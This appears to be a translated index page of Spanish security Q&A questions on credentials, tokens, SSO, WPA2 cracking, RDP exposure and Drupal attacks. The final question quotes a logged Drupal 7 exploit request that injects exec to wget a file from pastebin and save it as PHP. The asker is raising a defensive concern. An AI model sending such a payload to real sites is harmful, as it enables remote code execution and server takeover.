Todas las preguntas

0
respuestas

¿Es posible evitar almacenar el nombre de usuario y la contraseña en settings.xml en Jenkins? [cerrado]

En los archivos de origen del proyecto hay settings.xml , que según la documentación oficial contiene las credenciales de los servidores que jenkins debe autenticar, pero en texto plano. ¿Existe alguna práctica recomendada o alguna forma d...
pregunta 08.11.2016 - 11:48
0
respuestas

¿Es la forma correcta de combinar múltiples secretos en una clave HMAC?

Estoy usando HMAC + SHA256 para firmar y verificar reclamos en una aplicación web. Cada implementación tiene su propio secreto de 512 bits criptográfico al azar que puedo usar como clave HMAC, pero en algunos casos quiero mezclar otro secreto ta...
pregunta 09.04.2018 - 20:36
0
respuestas

¿El intercambio secreto de Shamir para Windows? [cerrado]

¿Existe una buena implementación de Shamir's Secret Sharing para Windows? Me gustaría transferir archivos de forma segura a través de múltiples canales y asegurarme de que solo el destinatario que recibe TODAS (y posiblemente la mayoría) de las...
pregunta 03.05.2018 - 17:34
0
respuestas

¿Pasar reclamos sobre el usuario en un token de acceso está "abusando" de OpenID Connect?

Primero, permítame asegurarle que he leído varias publicaciones sobre el tema antes de hacer esta pregunta, pero todavía estoy confundido y apreciaría más información. Entonces, aquí está la premisa: Hay una aplicación cliente que autenti...
pregunta 17.05.2018 - 11:17
0
respuestas

¿Necesito usar SAML y JWT para la autenticación en la aplicación web de SSO?

Soy nuevo en el proceso de autenticación de SAML, por lo que solo estoy tratando de averiguar si lo entiendo para poder integrar mi aplicación web (Angular / Nodejs) en un portal existente que actualmente utiliza SAML como medio de autenticación...
pregunta 01.05.2018 - 11:49
1
respuesta

¿Cuáles son los factores que hacen que un protocolo WPA2 sea adecuado para el agrietamiento?

Hace días, estaba descargando los apretones de manos de mis AP usando airodump-ng. Más tarde usaría aircrack-ng para descifrarlos utilizando listas de palabras que contendrían a propósito las frases de contraseña. Sin embargo, me di cuenta de qu...
pregunta 25.04.2018 - 10:05
0
respuestas

JWT en localStorage con sessionId encriptado

Lo que quiero: Almacena un JWT en localStorage. El JWT contiene reclamos sobre la autorización. Evita que el JWT sea robado y usado por un atacante (usando XSS) Evita CSRF Almacenar el JWT en localStorage es malo, ya que explotar XSS...
pregunta 30.04.2018 - 08:55
0
respuestas

Red interna segura con cientos de dispositivos pequeños que requieren administración web

¿Alguien sabe de un método o navegador, capaz de acceder a dispositivos de red más antiguos una vez que los nuevos navegadores comiencen a bloquear inicios de sesión no seguros y dispositivos que no tienen capacidad https?     
pregunta 10.04.2018 - 15:14
2
respuestas

¿Es abierto el RDP realmente peligroso? [duplicar]

Acabo de empezar a trabajar para una pequeña empresa (100-150 empleados). Me di cuenta de que cualquiera puede acceder de forma remota al servidor remoto utilizando el dominio correcto, lo que es bastante fácil de adivinar en función del nombr...
pregunta 16.04.2018 - 20:37
2
respuestas

¿Debo preocuparme por los intentos de ataque de usuario de Drupal 7?

En mis registros veo intentos regulares, algunas veces al día, como estos: http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP...
pregunta 21.04.2018 - 19:33